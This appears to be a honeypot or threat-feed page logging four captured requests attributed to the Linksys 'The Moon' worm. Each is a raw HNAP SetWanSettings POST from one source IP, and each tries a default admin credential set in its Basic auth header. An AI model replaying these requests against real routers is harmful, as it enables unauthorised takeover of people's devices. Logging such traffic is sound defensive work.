1-4 of 4 results (1 page)
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:41:01
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 506
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.178.35.134</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.178.35.222</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:41:00
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 503
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46cGFzc3dvcmQ=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.72.79.90</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.72.79.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:40:59
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 507
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46MTIzNA==
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.205.167.36</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.205.167.237</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:40:57
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 505
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46YWRtaW4=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.107.18.75</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.107.18.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>